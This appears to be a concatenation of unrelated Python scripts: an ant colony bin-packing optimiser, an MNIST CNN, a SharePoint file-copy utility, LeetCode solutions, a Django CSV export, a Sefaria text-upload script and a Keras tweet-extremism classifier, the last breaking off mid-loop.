                        temp_w = weight[temp]
                        temp_w.sort()
                        temp_num_sum = temp_num_sum + ph_mat.at[int(temp_w[0]),int(temp_w[1])]
                    # print(temp_num_sum)
                    # print(weight[subspace[sub_i]])
                    num_sum.append((temp_num_sum/len(ant.items[bin_count]))*((weight[subspace[sub_i]])**beta))
                    denom_sum = denom_sum + num_sum[sub_i]
                else:
                    num_sum.append(1*(weight[subspace[sub_i]]**beta))
                    denom_sum = denom_sum + num_sum[sub_i]
            #print(num_sum,denom_sum)
            num_sum = [ float(i) for i in num_sum ]
            denom_sum = sum(num_sum)
            # prob_fill = np.divide(num_sum,np.sum(num_sum))
            prob_fill = list((map(lambda x: x/denom_sum,num_sum)))
            # Roulette-wheel pick of the next item for the current bin.
            fill_index = Rwheel(prob_fill)
            #fill_index = np.argmax(prob_fill)
            ant.items[bin_count].append(subspace[fill_index])
            ant.weight()
            unvisit_wt.remove(subspace[fill_index])
        #print(ant.items)
        ant.fitness_func()
        #print(ant.Fitness)
        ## Computing the personal best solution of the individual ants
        if(ant.Fitness > Pbest):
            Pbest = copy.deepcopy(ant.Fitness)
            Pbest_items = copy.deepcopy(ant.items)
    ## Computing the global best solution
    if(Pbest>Gbest):
        #print("Gbest" , time)
        Gbest = copy.deepcopy(Pbest)
        Gbest_items = copy.deepcopy(Pbest_items)
    ############################## Updation of Pheromine at the end of one iteration ################################################
    # Alternate reinforcement between the iteration-best and global-best
    # solutions (switches to global-best every 500/n generations).
    if(rot<500/n):
        fit_g = Pbest
        rot = rot+1
        d = Pbest_items
    else:
        fit_g = Gbest
        rot = 0
        d = Gbest_items
    # Evaporation.
    ph_mat.loc[:,:]= ph_mat.loc[:,:]*(rou)
    x_comb = []
    for i in range(len(d)):
        y_comb = copy.deepcopy(x_comb)
        for j in range(i,len(d)):
            comb = combinations(weight[d[i]], 2)
            for k in comb:
                inter = np.intersect1d(k,weight[d[j]])
                # print(k)
                if(len(inter)==2):
                    # NOTE(review): this condition is duplicated; one of the
                    # two identical checks is redundant.
                    if(len(inter)==2):
                        if(k not in y_comb):
                            # Reinforce the (sorted) weight pair by fit_g.
                            k_s = np.array([int(k[0]),int(k[1])])
                            k_s.sort()
                            ph_mat.loc[k_s[0],k_s[1]] = ph_mat.loc[k_s[0],k_s[1]] + (1*fit_g)
                            x_comb.append(k)
    # NOTE(review): `0.05**1/n` parses as (0.05**1)/n; the MMAS t_min formula
    # presumably intends 0.05**(1/n) -- as written the two factors cancel.
    t_min = min_tau * (1-(0.05**1/n))/(((n/2)-1)*(1-(0.05**1/n)))
    # print(t_min)
    ph_mat[ph_mat < t_min]= t_min
    ### Displaying the results
    # NOTE(review): DataFrame.append is removed in pandas 2.x (use pd.concat).
    df = df.append([{'Iteration':time,'P_Bins':len(Pbest_items),'Person_Fitness':round(Pbest,4),'G_Bins':len(Gbest_items),'Global_Fitness':round(Gbest,4)}],ignore_index=True)
    time = time + 1
    print('Gen:',time)
    print(len(Pbest_items))
    print(len(Gbest_items))
### Logging of the results to excel file
with pd.ExcelWriter('ACO.xlsx') as writer:
    df.to_excel(writer,'ACO')
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
def weight_variable(shape):
    """Create a trainable weight tensor initialised from a truncated normal (stddev 0.1)."""
    init = tf.truncated_normal(shape, stddev=0.1)
    return tf.Variable(init)
def bias_variable(shape):
    """Create a trainable bias tensor filled with the constant 0.1."""
    init = tf.constant(0.1, shape=shape)
    return tf.Variable(init)
def conv2d(x, W):
    """2-D convolution of `x` with kernel `W`: unit stride, SAME padding."""
    return tf.nn.conv2d(x, W, padding='SAME', strides=[1, 1, 1, 1])
def max_pool_2x2(x):
    """2x2 max pooling with stride 2 and SAME padding (halves spatial dims)."""
    pool_shape = [1, 2, 2, 1]
    return tf.nn.max_pool(x, ksize=pool_shape, strides=pool_shape, padding='SAME')
def W_sparse(dim, times):
    """Build a sparse (dim*times, dim) 0/1 matrix that routes each input unit
    to `times` randomly permuted output rows (a random sparse projection)."""
    import numpy as np
    # BUG FIX: range() is not multipliable on Python 3; wrap it in list().
    tp = list(range(dim)) * times
    idx = np.row_stack((range(dim * times), np.random.permutation(tp))).transpose().tolist()
    return tf.SparseTensor(indices=idx, values=[1.0] * (dim * times), shape=[dim * times, dim])
# Build and train a small CNN with a random sparse projection head on MNIST.
sess = tf.InteractiveSession()
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
x = tf.placeholder(tf.float32, shape=[None, 784])
y_ = tf.placeholder(tf.float32, shape=[None, 10])
x_image = tf.reshape(x, [-1,28,28,1])
# First conv block: 5x5 conv (32 maps) + 2x2 max pool -> 14x14x32.
W_conv1 = weight_variable([5, 5, 1, 32])
b_conv1 = bias_variable([32])
h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
h_pool1 = max_pool_2x2(h_conv1)
# Second conv block: 5x5 conv (64 maps) + 2x2 max pool -> 7x7x64.
W_conv2 = weight_variable([5, 5, 32, 64])
b_conv2 = bias_variable([64])
h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
h_pool2 = max_pool_2x2(h_conv2)
h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])
h_pool2_trans = tf.transpose(h_pool2_flat)
# Random sparse 0/1 projection: triplicates the features in permuted order.
W_sp = W_sparse(7*7*64, 3);
h_pool2_rand = tf.sparse_tensor_dense_matmul(W_sp, h_pool2_trans)
h_pool2_rand_trans = tf.reshape(tf.transpose(h_pool2_rand), [-1, 7*7*64*3, 1, 1])
# 17-tap convolution with stride 5 plus average pooling over the projection.
W_conv3 = weight_variable([17, 1, 1, 1])
b_conv3 = bias_variable([1])
tp_conv3 = tf.nn.conv2d(h_pool2_rand_trans, W_conv3, strides=[1, 5, 1, 1], padding='SAME') + b_conv3
h_conv3 = tf.nn.relu(tp_conv3)
h_pool3 = tf.nn.avg_pool(h_conv3, [1, 11, 1, 1], strides=[1, 3, 1, 1], padding='SAME')
fc_in = tf.reshape(h_pool3, [-1, 628])
#xx = h_pool2_rand_trans.eval(feed_dict={x: mnist.test.images, y_: mnist.test.labels})
#tp1 = tp_conv3.eval(feed_dict={h_pool2_rand_trans: xx})
#hc3 = h_conv3.eval(feed_dict={tp_conv3: tp1})
#hp3 = h_pool3.eval(feed_dict={h_conv3: hc3})
#keep_prob = tf.placeholder(tf.float32)
#h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
#
# Final softmax layer with a cross-entropy objective trained by Adam.
W_fc2 = weight_variable([628, 10])
b_fc2 = bias_variable([10])
y_conv=tf.nn.softmax(tf.matmul(fc_in, W_fc2) + b_fc2)
cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y_conv), reduction_indices=[1]))
train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
correct_prediction = tf.equal(tf.argmax(y_conv,1), tf.argmax(y_,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
sess.run(tf.initialize_all_variables())
# 20000 minibatches of 50; report training accuracy every 100 steps.
for i in range(20000):
    batch = mnist.train.next_batch(50)
    if i%100 == 0:
        train_accuracy = accuracy.eval(feed_dict={
            x:batch[0], y_: batch[1]})
        print("step %d, training accuracy %g"%(i, train_accuracy))
    train_step.run(feed_dict={x: batch[0], y_: batch[1]})
print("test accuracy %g"%accuracy.eval(feed_dict={
    x: mnist.test.images, y_: mnist.test.labels}))
import os
import glob
import shutil
import time
import datetime

# Copy the RNB2021 Excel workbooks from the mapped SharePoint drive into a
# freshly created destination folder named after the current date/time
# (e.g. "25 sep 1400"), retrying files that are temporarily locked.
today = datetime.datetime.today()
date = today.strftime('%d')
month = today.strftime('%b').lower()
t = today.strftime('%H')
folder_name = f'{date} {month} {t}00'

# the sharepoint area, where the files need to be copied from, is mapped as a network drive (S:/)
src_dir = 'S:/'
dst_dir = 'G:/TPD/FC/CRM/RNB/RNB2021/RNB-files/Files from Sharepoint/' + folder_name
# src_dir = 'C:/Users/nabm/Desktop/test_files'
# dst_dir = 'G:/TPD/FC/CRM/RNB/RNB2021/RNB-files/Files from Sharepoint/' + 'test'

# files to ignore during copying
ignore_files = ['Hanz_RNB2021.xlsm', 'Ivar Aasen_RNB2021.xlsm']

# make destination directory, then work relative to the source directory
os.mkdir(dst_dir)
os.chdir(src_dir)

count = 0  # copied-files counter
t0 = time.perf_counter()

# loop through the files in the source directory, and copy files matching a specific glob pattern
for file in glob.iglob('*/RNB2021/*_RNB2021.xlsm'):
    # BUG FIX: os.path.basename handles the platform's separators; the
    # original split on '\\' only, which never matched POSIX-style paths.
    if os.path.basename(file.strip()) in ignore_files:
        continue
    # Retry while the file is locked (e.g. open in Excel on SharePoint).
    while True:
        try:
            shutil.copy(file, dst_dir)
        except PermissionError:
            print(f"Permission denied to file: {file}. Will try again in 15 seconds...")
            time.sleep(15)
            continue
        else:
            print(f"{file} copied.")
            count += 1
            break

t1 = time.perf_counter()
time_secs = round(t1-t0, 0)
time_mins = round((t1-t0)/60, 1)

# display key information from program
print(f"\n{count} files were matched and copied to destination.")
print(f"It took {time_mins} minutes ({time_secs} seconds) to copy the files.")
# https://leetcode-cn.com/problems/di-yi-ge-zhi-chu-xian-yi-ci-de-zi-fu-lcof/
# 剑指 Offer 50. 第一个只出现一次的字符
from collections import Counter
# 用哈续表存储频数
class Solution:
    """Offer 50: first character occurring exactly once, via a hand-built table."""

    def firstUniqChar(self, s: str) -> str:
        """Return the first character that appears exactly once in s, or ' '."""
        seen = {}
        for ch in s:
            # 1 on first sight, 2 meaning "seen more than once" (count capped).
            seen[ch] = 2 if ch in seen else 1
        for ch in s:
            if seen[ch] == 1:
                return ch
        return ' '
# 使用 collection 的 counter
class Solution2:
    """Counter-based variant of Offer 50."""

    def firstUniqChar(self, s: str) -> str:
        """Return the first character whose total count in s is 1, or ' '."""
        freq = Counter(s)
        return next((ch for ch in s if freq[ch] == 1), ' ')
|
#!/usr/bin/env python
# !-*- coding:utf-8 -*-
import json
Code_ERROR = "0"  # error
Code_OK = "1"  # success
class ResartInfo(object):
    """Restart-result container: a status code, a message and a list of failures.

    Setters return self so calls can be chained fluently.
    """

    def __init__(self):
        self.code = Code_OK   # "1" = success, "0" = error
        self.msg = "ok"
        self.failList = []    # entries that failed

    def json(self):
        """JSON format data."""
        # Local name renamed: the original shadowed the imported json module.
        payload = {
            'code': self.code,
            'msg': self.msg,
            'failList': self.failList,
        }
        return payload

    def setCode(self, code=1):
        # NOTE(review): the default is the int 1 while Code_OK is the string
        # "1" -- kept as-is for backward compatibility; confirm with callers.
        self.code = code
        return self

    def setMsg(self, msg="ok"):
        self.msg = msg
        return self

    def setfailList(self, list=None):
        # Parameter keeps its historical name for keyword callers, but the
        # mutable default [] is replaced by None: the original shared one
        # list object across every default call, so mutations leaked
        # between instances.
        self.failList = [] if list is None else list
        return self

    def getCode(self):
        return self.code

    def getMsg(self):
        return self.msg

    def getFailList(self):
        return self.failList

    def getResartInfo(self):
        return self
def getInstance():
    """Module-level factory: return a brand-new ResartInfo instance."""
    info = ResartInfo()
    return info
|
import csv
from django.contrib.auth.models import User

# Export id/username/email/date_joined for every user to a CSV file.
header = ('id', 'username', 'email', 'date_joined')
users = User.objects.all().values_list(*header)
# newline='' is required by the csv module; without it each row is followed
# by a blank line on Windows.
with open('io/csv/users.csv', 'w', newline='') as csvfile:
    user_writer = csv.writer(csvfile)
    user_writer.writerow(header)
    for user in users:
        user_writer.writerow(user)
|
import django
django.setup()
from sefaria.model import *
import re
from sources.functions import getGematria, post_text, post_index, post_link
import requests
from linking_utilities.dibur_hamatchil_matcher import match_ref
from sefaria.utils.talmud import section_to_daf
#SERVER = 'http://localhost:9000'
SERVER = 'https://maharsha.cauldron.sefaria.org'
# Match statistics: A = dibur-hamatchil lookups attempted, Y = lookups that
# produced a Talmud ref (both incremented in the main loop, printed at end).
Y, A = 0, 0
def find_dh(dh, daf):
    """Locate the ref on Eruvin `daf` whose text matches the dibur hamatchil `dh`.

    Uses the Wikisource Talmud Bavli text and a whitespace tokenizer.
    Returns the first entry of match_ref's 'matches'; the caller only tests
    it for truthiness, so a falsy "no match" value is acceptable.
    """
    talmud = Ref(f'Eruvin {daf}').text('he', vtitle='Wikisource Talmud Bavli')
    return match_ref(talmud, [dh], base_tokenizer=lambda x: x.split())['matches'][0]
book = 'Rav Nissim Gaon on Eruvin'
with open('ranag.txt', encoding='utf-8') as fp:
    data = fp.read()
pages = []
links = []
# The source file stores footnotes after a '**' separator; splice each
# footnote back in at its '*' marker as an inline <i class="footnote"> tag
# ('$' is a placeholder so already-spliced markers are not matched again).
data, notes = data.split('**')
notes = re.findall('\*(.*?)\n', notes)
while '*' in data:
    data = data.replace('*', f'<sup>$</sup><i class="footnote">{notes.pop(0).strip()}</i>', 1)
data = data.replace('$', '*')
data = data.split('\n')
# Partition lines into pages (amudim) keyed by a running section index
# derived from the "daf X amud Y" header lines.
old_sec = -1
twice = False
for line in data:
    line = ' '.join(line.split())
    if not line:
        continue
    loc = re.findall(f'רב ניסים גאון מסכת עירובין דף (.*?) עמוד ([אב])', line)
    if loc:
        daf, amud = loc[0]
        sec = getGematria(daf) * 2 + getGematria(amud) - 3
        # A repeated header marks duplicated content; from its third
        # appearance on, lines are skipped until the next new header.
        if sec == old_sec:
            if twice:
                skip = True
            twice = True
        else:
            skip, twice = False, False
        old_sec = sec
        continue
    # NOTE(review): `skip` is unbound if any text precedes the first header.
    if skip:
        continue
    pages += [[] for _ in range(sec+1-len(pages))]
    pages[sec].append(line)
# A comment that does not end with ':' continues onto the next non-empty
# page; pull the continuation (up to its first ':') back onto this page.
for p, page in enumerate(pages):
    if not page:
        continue
    if not page[-1].endswith(':'):
        try:
            next_page = [l for l in pages[p+1:] if l!=[]][0]
        except IndexError:
            continue
        next_ind = pages.index(next_page)
        if ':' not in next_page[0]:
            print('no :', next_page[0])
            continue
        prev, next = next_page[0].split(':')
        page[-1] += f' {prev}:'
        next_page[0] = next.strip()
        if not next_page[0]:
            next_page.pop(0)
        pages[next_ind] = next_page
# Bold each dibur hamatchil (text before the first '.') and record a link to
# the matching Talmud passage when the matcher finds one.
for sec, page in enumerate(pages):
    for seg, comm in enumerate(page):
        if '.' in comm:
            dh, comm = comm.split('.', 1)
            pages[sec][seg] = f'<b>{dh}.</b>{comm}'
            daf = section_to_daf(sec+1)
            talmud = find_dh(dh, daf)
            A += 1
            if talmud:
                Y += 1
                links.append({'refs': [talmud.tref, f'{book} {daf}:{seg+1}'],
                              'generated_by': 'r. nissim gaon eruvin',
                              'type': 'Commentary',
                              'auto': True})
# Clone the "Rav Nissim Gaon on Shabbat" index, retitle it for Eruvin, then
# post the index, the text and the generated links to the target server.
ind = requests.request('get', 'https://sefaria.org/api/v2/raw/index/Rav_Nissim_Gaon_on_Shabbat').json()
ind['title'] = ind['schema']['titles'][1]['text'] = ind['schema']['key'] = book
ind['schema']['titles'][0]['text'] = 'רב נסים גאון על מסכת עירובין'
ind['base_text_titles'] = ['Eruvin']
post_index(ind, server=SERVER)
text_version = {
    'versionTitle': 'Vilna Edition',
    'versionSource': 'http://primo.nli.org.il/primo-explore/fulldisplay?vid=NLI&docid=NNL_ALEPH001300957&context=L',
    'language': 'he',
    'text': pages
}
post_text(book, text_version, server=SERVER, index_count='on')
post_link(links, server=SERVER)
print(Y, A)
|
import time
from contextlib import contextmanager
import gc
gc.collect()
@contextmanager
def timer(name):
    """Context manager that prints how many whole seconds its body took."""
    started = time.time()
    yield
    elapsed = round(time.time() - started)
    print("\n\n" + name + ' done in ' + str(elapsed) + 's \n')
print("\n\nStarting\n\n")
with timer("Importing and setting up libraries"):
    import os
    import csv
    import math
    import numpy as np
    import nltk
    from nltk.corpus import stopwords
    import collections
    import string
    import re
    from sklearn.model_selection import KFold
    from keras.models import Sequential
    from keras.layers import Dense
    from keras.layers import LSTM
    from keras.layers.embeddings import Embedding
    from keras.preprocessing import sequence
    from keras.preprocessing.text import Tokenizer
    import time
    import pickle
    from nltk.corpus import words
    import sys
    from keras.layers import Dense, Flatten, LSTM, Conv1D, MaxPooling1D, Dropout, Activation, GRU
    from sklearn.metrics import precision_recall_fscore_support
    from keras import backend
    import tensorflow
    # Stopword list and lowercased reference English vocabulary, used by
    # preprocess() and to fit the tokenizer later.
    cachedStopWords = stopwords.words("english")
    allEnglishWords = words.words()
    allEnglishWords[:] = [x.lower() for x in allEnglishWords]
    # Pin TF to 1 GPU / 8 CPUs and let GPU memory grow on demand.
    config = tensorflow.ConfigProto( device_count = {'GPU': 1 , 'CPU': 8} )
    config.gpu_options.allow_growth = True
    config.gpu_options.per_process_gpu_memory_fraction = 1
    sess = tensorflow.Session(config=config)
    backend.set_session(sess)
def clean(s):
    """Strip every ASCII punctuation character from s."""
    table = str.maketrans("", "", string.punctuation)
    return s.translate(table)
def preprocess(text):
    """Normalise one raw tweet: strip metadata, punctuation, stopwords,
    non-dictionary tokens, tags, digits and a leading retweet marker.

    Relies on the module-level cachedStopWords and allEnglishWords lists.
    """
    # The tweet text follows the last comma of the raw field.
    text = text.split(",")[-1]
    text = clean(text).lower()
    text=text.lower()  # NOTE(review): redundant, already lowercased above
    text = ' '.join([word for word in text.split() if word not in cachedStopWords])
    # Drop mentions, URLs and escape sequences.
    text = ' '.join([word for word in text.split() if( not word.startswith("@") and not word.startswith("http") and not word.startswith("\\")) ])
    # Keep only dictionary English words.
    text = ' '.join([word for word in text.split() if word in allEnglishWords])
    #text = re.sub("[_]","",text)
    #remove tags
    text=re.sub("</?.*?>"," <> ",text)
    # remove special characters and digits
    text=re.sub("(\\d|\\W)+"," ",text)
    # Remove a leading retweet marker.
    if(text.startswith("rt ") or text.startswith(" rt")):
        text = text[3:]
    if(text == "rt"):
        text = ""
    # Trim leading spaces left by the removals above.
    while(text != "" and text[0] == ' '):
        text = text[1:]
    return text
with timer("Reading data"):
    # Preprocessed tweet texts plus one 0/1 label list per annotation task,
    # with positive-example counters for each task.
    x = []
    y = []
    radical = []
    violentExtremism = []
    nonViolentExtremism = []
    radicalViolence = []
    nonRadicalViolence = []
    posViolentExtremism = 0
    posNonViolentExtremism = 0
    posRadicalViolence = 0
    posNonRadicalViolence = 0
    with open("input.csv",'r', encoding="utf8") as csvFile:
        reader = csv.reader(csvFile)
        p = 0
        for row in reader:
            #To ignore header
            if(p == 0):
                p = p + 1
                continue
            # Keep only rows where all four label columns are present.
            if(len(row) >= 2):
                if(row[1] == "" or row[2] == "" or row[3] == "" or row[4] == ""):
                    continue
                # The tweet text follows the first comma of column 0.
                s = row[0].split(',', 1)[1]
                x.append(preprocess(s))
                if(row[1] == "0.0"):
                    violentExtremism.append(0)
                else:
                    posViolentExtremism += 1
                    violentExtremism.append(1)
                if(row[2] == "0.0"):
                    nonViolentExtremism.append(0)
                else:
                    posNonViolentExtremism += 1
                    nonViolentExtremism.append(1)
                if(row[3] == "0.0"):
                    radicalViolence.append(0)
                else:
                    posRadicalViolence += 1
                    radicalViolence.append(1)
                if(row[4] == "0.0"):
                    nonRadicalViolence.append(0)
                else:
                    posNonRadicalViolence += 1
                    nonRadicalViolence.append(1)
                p = p + 1
    # NOTE(review): `csvFile.close` is missing the call parentheses (a no-op)
    # and is redundant anyway because the `with` block closes the file.
    csvFile.close
    print("Size of x:",len(x))
    print("Size of violentExtremism : ", len(violentExtremism), "\t positive : ", posViolentExtremism)
    print("Size of nonViolentExtremism : ", len(nonViolentExtremism), "\t positive : ", posNonViolentExtremism)
    print("Size of radicalViolence : ", len(radicalViolence), "\t positive : ", posRadicalViolence)
    print("Size of nonRadicalViolence : ", len(nonRadicalViolence), "\t positive : ", posNonRadicalViolence)
# print(violentExtremism)
# print(nonViolentExtremism)
# print(radicalViolence)
# print(nonRadicalViolence)
# Second cleaning pass: strip remaining punctuation, collapse whitespace,
# lowercase again and drop stopwords.
X = []
for t in x:
    t = re.sub(r'[^\w\s]',' ',t)
    t = ' '.join([word for word in t.split() if word != " "])
    t = t.lower()
    t = ' '.join([word for word in t.split() if word not in cachedStopWords])
    X.append(t)
with timer("Making tokeniser"):
    # The tokenizer is fitted on the full English vocabulary, not the corpus.
    vocabSize = len(allEnglishWords)
    tokenizer = Tokenizer(num_words= vocabSize)
    tokenised = tokenizer.fit_on_texts(allEnglishWords)
kf = KFold(n_splits=10)
Features = X
with timer("Making Variables"):
    # Cross-fold accumulators: accuracy, per-class precision/recall/F-score
    # ([class 0, class 1, class 2]) and total epochs -- one set per task.
    gViolentExtremismAccu = 0
    gViolentExtremismPrecision = [0,0, 0]
    gViolentExtremismRecall = [0,0, 0]
    gViolentExtremismFScore = [0,0, 0]
    gViolentExtremismEpochs = 0
    gNonViolentExtremismAccu = 0
    gNonViolentExtremismPrecision = [0,0, 0]
    gNonViolentExtremismRecall = [0,0, 0]
    gNonViolentExtremismFScore = [0,0, 0]
    gNonViolentExtremismEpochs = 0
    gRadicalViolenceAccu = 0
    gRadicalViolencePrecision = [0,0, 0]
    gRadicalViolenceRecall = [0,0, 0]
    gRadicalViolenceFScore = [0,0, 0]
    gRadicalViolenceEpochs = 0
    gNonRadicalViolenceAccu = 0
    gNonRadicalViolencePrecision = [0,0, 0]
    gNonRadicalViolenceRecall = [0,0, 0]
    gNonRadicalViolenceFScore = [0,0, 0]
    gNonRadicalViolenceEpochs = 0
with timer("trying to clear GPU memory initially "):
    backend.clear_session()
    for i in range(20):
        gc.collect()
with timer("Making label vector"):
    # One-hot encode each 0/1 label into 3 columns (third column stays 0).
    YViolentExtremism = np.zeros([len(violentExtremism),3],dtype = int)
    for x in range(0, len(violentExtremism)):
        YViolentExtremism[x,violentExtremism[x]] = 1
    YNonViolentExtremism = np.zeros([len(nonViolentExtremism),3],dtype = int)
    for x in range(0, len(nonViolentExtremism)):
        YNonViolentExtremism[x,nonViolentExtremism[x]] = 1
    YRadicalViolence = np.zeros([len(radicalViolence),3],dtype = int)
    for x in range(0, len(radicalViolence)):
        YRadicalViolence[x,radicalViolence[x]] = 1
    YNonRadicalViolence = np.zeros([len(nonRadicalViolence),3],dtype = int)
    for x in range(0, len(nonRadicalViolence)):
        YNonRadicalViolence[x,nonRadicalViolence[x]] = 1
with timer("Making Embedding_index dict"):
    # Load 100-d GloVe Twitter vectors into a word -> vector dict.
    embeddings_index = dict()
    f = open('glove.twitter.27B/glove.twitter.27B.100d.txt', encoding="utf8")
    for line in f:
        values = line.split()
        word = values[0]
        coefs = np.asarray(values[1:], dtype='float32')
        embeddings_index[word] = coefs
    f.close()
    print('Loaded %s word vectors.' % len(embeddings_index))
with timer("Making Embedding Matrix"):
    # Row i holds the GloVe vector for tokenizer index i (zeros if unknown).
    embedding_matrix = np.zeros((vocabSize, 100))
    for word, index in tokenizer.word_index.items():
        if index > vocabSize - 1:
            break
        else:
            embedding_vector = embeddings_index.get(word)
            if embedding_vector is not None:
                embedding_matrix[index] = embedding_vector
with timer("Cross Validation for Violent Extremism"):
    iteration = 0
    # 10-fold CV: per fold, train a Conv1D + stacked-LSTM classifier and
    # accumulate accuracy / per-class metrics into the g* running totals.
    for train_index, test_index in kf.split(Features):
        with timer("Making nueral network for iteration : " + str(iteration + 1) + " for Violent Extremism"):
            print("\n\n\n\nMaking nueral Network for iteration:",iteration, " for Violent Extremism")
            iteration += 1
            #Making Training and Testing Data
            X_Train = [Features[x] for x in train_index]
            X_Test = [Features[x] for x in test_index]
            violentExtremismTrain = YViolentExtremism[train_index]
            violentExtremismTest = YViolentExtremism[test_index]
            violentExtremismTest1 = [violentExtremism[x] for x in test_index]
            tokenisedTrain = tokenizer.texts_to_sequences(X_Train)
            tokenisedTest = tokenizer.texts_to_sequences(X_Test)
            max_review_length = 180
            X_Train = sequence.pad_sequences(tokenisedTrain, maxlen=max_review_length,padding='post')
            X_Test = sequence.pad_sequences(tokenisedTest, maxlen=max_review_length,padding='post')
            # Model: GloVe embedding -> Conv1D -> 3 stacked LSTMs -> Dense(3).
            violentExtremismModel = Sequential()
            violentExtremismModel.add(Embedding(vocabSize, 100, input_length=max_review_length,weights=[embedding_matrix]))
            violentExtremismModel.add(Dropout(0.2))
            violentExtremismModel.add(Conv1D(64, 5, activation='relu'))
            violentExtremismModel.add(MaxPooling1D(pool_size=4))
            violentExtremismModel.add(LSTM(100, dropout=0.2, recurrent_dropout=0.2, return_sequences=True))
            violentExtremismModel.add(LSTM(32, dropout=0.2, recurrent_dropout=0.2, return_sequences=True))
            violentExtremismModel.add(LSTM(16, dropout=0.2, recurrent_dropout=0.2))
            violentExtremismModel.add(Dense(3, activation='sigmoid'))
            violentExtremismModel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
            epochs = 1
            # Train one epoch at a time until training accuracy reaches 0.99
            # and at least 15 epochs have run, capped at 100 epochs.
            print("\nTraining until accuracy improves for epoch = ", epochs, " for iteration : ", iteration, " for Violent Extremism")
            fitHistory = violentExtremismModel.fit(X_Train, violentExtremismTrain, epochs = 1, batch_size = 150)
            trainingAccuracy = fitHistory.history['acc']
            while(trainingAccuracy[0] < 0.99 or epochs < 15):
                epochs += 1
                print("\nTraining until accuracy improves for epoch = ", epochs, " for iteration : ", iteration, " for Violent Extremism")
                fitHistory = violentExtremismModel.fit(X_Train, violentExtremismTrain, epochs = 1, batch_size = 150)
                trainingAccuracy = fitHistory.history['acc']
                if(epochs == 100):
                    break
            violentExtremismScore = violentExtremismModel.evaluate(X_Test,violentExtremismTest,verbose = 100)
            accuViolentExtremismLstm1 = violentExtremismScore[1]
            print("\nViolence Extremism training Done for Iteration ",iteration, " for part 1 with epochs : ", epochs)
            positiveViolentExtremism = [x for x in violentExtremismTest if x[0] == 1]
            predictViolentExtremism = violentExtremismModel.predict_classes(X_Test, verbose = 1)
            positivePredViolentExtremism = [x for x in predictViolentExtremism if x > 0]
            prec1, recall1, fscore1, support1 = precision_recall_fscore_support(violentExtremismTest1, predictViolentExtremism)
            print("Number of positive Examples : ",len(positiveViolentExtremism), "\nratio : ", (len(positiveViolentExtremism) / len(violentExtremismTest)), "\nPositive Predicted : ", len(positivePredViolentExtremism), "\naccuracy : ", accuViolentExtremismLstm1, "\nwrongness : ", 1 - accuViolentExtremismLstm1,"\n\nPrecision : ",prec1,"\nRecall : ", recall1, "\nf1Score : ", fscore1, "\nsupport : ", support1 )
            gViolentExtremismAccu += accuViolentExtremismLstm1
            # Per-class metric entries can be missing when a class is absent
            # from a fold; the try/except blocks skip those entries.
            gViolentExtremismPrecision[0] += prec1[0]
            try:
                gViolentExtremismPrecision[1] += prec1[1]
            except:
                #doNothing
                print("LAla")
            try:
                gViolentExtremismPrecision[2] += prec1[2]
            except:
                print("LALALALA")
            gViolentExtremismRecall[0] += recall1[0]
            try:
                gViolentExtremismRecall[1] += recall1[1]
            except:
                #doNothing
                print("LAla")
            try:
                gViolentExtremismRecall[2] += recall1[2]
            except:
                print("LALALALA")
            gViolentExtremismFScore[0] += fscore1[0]
            try:
                gViolentExtremismFScore[1] += fscore1[1]
            except:
                #doNothing
                print("LAla")
            try:
                gViolentExtremismFScore[2] += fscore1[2]
            except:
                print("LALALALA")
            gViolentExtremismEpochs += epochs
        # Free the fold's model and GPU memory before the next fold.
        with timer("trying to clear GPU memory"):
            del violentExtremismModel
            backend.clear_session()
            for i in range(20):
                gc.collect()
with timer("Cross Validation for Non Violent Extremism"):
    iteration = 0
    # Same 10-fold CV pipeline as above, for the Non Violent Extremism task.
    for train_index, test_index in kf.split(Features):
        with timer("Making nueral network for iteration : " + str(iteration + 1) + " for Non Violent Extremism"):
            print("\n\n\n\nMaking nueral Network for iteration:",iteration, " for Non Violent Extremism")
            iteration += 1
            #Making Training and Testing Data
            X_Train = [Features[x] for x in train_index]
            X_Test = [Features[x] for x in test_index]
            nonViolentExtremismTrain = YNonViolentExtremism[train_index]
            nonViolentExtremismTest = YNonViolentExtremism[test_index]
            nonViolentExtremismTest1 = [nonViolentExtremism[x] for x in test_index]
            tokenisedTrain = tokenizer.texts_to_sequences(X_Train)
            tokenisedTest = tokenizer.texts_to_sequences(X_Test)
            max_review_length = 180
            X_Train = sequence.pad_sequences(tokenisedTrain, maxlen=max_review_length,padding='post')
            X_Test = sequence.pad_sequences(tokenisedTest, maxlen=max_review_length,padding='post')
            # Model: GloVe embedding -> Conv1D -> 3 stacked LSTMs -> Dense(3).
            nonViolentExtremismModel = Sequential()
            nonViolentExtremismModel.add(Embedding(vocabSize, 100, input_length=max_review_length,weights=[embedding_matrix]))
            nonViolentExtremismModel.add(Dropout(0.2))
            nonViolentExtremismModel.add(Conv1D(64, 5, activation='relu'))
            nonViolentExtremismModel.add(MaxPooling1D(pool_size=4))
            nonViolentExtremismModel.add(LSTM(100, dropout=0.2, recurrent_dropout=0.2, return_sequences=True))
            nonViolentExtremismModel.add(LSTM(32, dropout=0.2, recurrent_dropout=0.2, return_sequences=True))
            nonViolentExtremismModel.add(LSTM(16, dropout=0.2, recurrent_dropout=0.2))
            nonViolentExtremismModel.add(Dense(3, activation='sigmoid'))
            nonViolentExtremismModel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
            epochs = 1
            # Train one epoch at a time until training accuracy reaches 0.99
            # and at least 15 epochs have run, capped at 100 epochs.
            print("\nTraining until accuracy improves for epoch = ", epochs, " for iteration : ", iteration, " for Non Violent Extremism")
            fitHistory = nonViolentExtremismModel.fit(X_Train, nonViolentExtremismTrain, epochs = 1, batch_size = 150)
            trainingAccuracy = fitHistory.history['acc']
            while(trainingAccuracy[0] < 0.99 or epochs < 15):
                epochs += 1
                print("\nTraining until accuracy improves for epoch = ", epochs, " for iteration : ", iteration, " for Non Violent Extremism")
                fitHistory = nonViolentExtremismModel.fit(X_Train, nonViolentExtremismTrain, epochs = 1, batch_size = 150)
